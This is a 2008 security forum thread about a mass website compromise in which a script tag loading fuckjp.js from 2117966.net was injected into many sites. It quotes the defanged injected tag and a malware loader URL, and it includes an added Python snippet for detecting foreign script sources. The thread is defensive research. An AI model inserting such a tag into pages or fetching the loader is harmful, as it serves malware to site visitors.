Author Topic: 2117966.net fuckjp.js  (Read 7462 times)

March 14, 2008, 03:58:34 pm

cjeremy

Saw this on SANS this morning: http://isc.sans.org/diary.html?storyid=4139 and I know Steven Adair from the Shadow Server Foundation... and he is a really sharp guy that posted more details here: http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080313 and his personal blog is here: http://www.securityzone.org/

Doing a Google search for fuckjp.js looks like the 10,000 infected websites may be fairly accurate.

--jeremy

March 14, 2008, 04:03:12 pm
Reply #1

sowhat-x

  • Guest
Excellent info - thanks!  :)

March 14, 2008, 04:03:51 pm
Reply #2

cjeremy

Oh, should have added this:

Code:
<script src=hxxp://www.2117966.net/fuckjp.js></script>
is what I have been seeing from my Google search results....
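
Added example, not part of the original post: one way a site owner could check their own pages for a script tag like the one quoted above, by listing every `<script src=...>` whose host is not one of the site's own. The function names, the `example.org` hosts and the sample page are assumptions constructed for illustration; only the injected tag is taken from this thread.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit


def refang(url):
    """Map a defanged scheme (hxxp/hxxps) back to http/https, for parsing only."""
    return "http" + url[4:] if url.lower().startswith("hxxp") else url


class ScriptSrcCollector(HTMLParser):
    """Collects (line, src) for every <script> tag carrying a src attribute."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        for name, value in attrs:
            # html.parser lowercases names and accepts unquoted values,
            # which is how the tag quoted in the thread is written.
            if name == "src" and value:
                self.sources.append((self.getpos()[0], value.strip()))


def foreign_scripts(html, own_hosts):
    """Return (line, host, src) for scripts loaded from hosts not in own_hosts.

    own_hosts must be lowercase; relative URLs have no host and are skipped.
    """
    collector = ScriptSrcCollector()
    collector.feed(html)
    collector.close()
    hits = []
    for line, src in collector.sources:
        host = urlsplit(refang(src)).hostname
        if host and host not in own_hosts:
            hits.append((line, host, src))
    return hits


# Constructed sample page; line 5 carries the tag quoted in the post above.
SAMPLE_PAGE = """<html><head>
<script src="/js/site.js"></script>
<script src="//static.example.org/lib.js"></script>
</head><body>
<p>Product description</p><script src=hxxp://www.2117966.net/fuckjp.js></script>
</body></html>"""

if __name__ == "__main__":
    for hit in foreign_scripts(SAMPLE_PAGE, {"www.example.org", "static.example.org"}):
        print(hit)
```
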

March 14, 2008, 05:02:57 pm
Reply #3

JohnC

This is giving a 404 at the moment. Anybody have a copy of fuckjp.js or fuckjp0.js ?

March 14, 2008, 05:13:22 pm
Reply #4

sowhat-x

  • Guest

March 26, 2008, 12:09:35 pm
Reply #5

sowhat-x

  • Guest
Here you go...it's officially 'leaked' now  ;)
http://www.0x000000.com/?i=534

March 26, 2008, 02:54:49 pm
Reply #6

MysteryFCM

Might want to get Bobby to play with that for Malzilla ;)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

March 26, 2008, 06:00:39 pm
Reply #7

bobby

Does not look complete.
I'll try to trace back the variables, and get the URL if possible.

March 27, 2008, 12:56:02 am
Reply #8

JohnC

Looks like something along the lines of this, which is offline: a.njnk.net/cgi-bin/jl/jloader.pl?source=&system_id=none&qtver=0x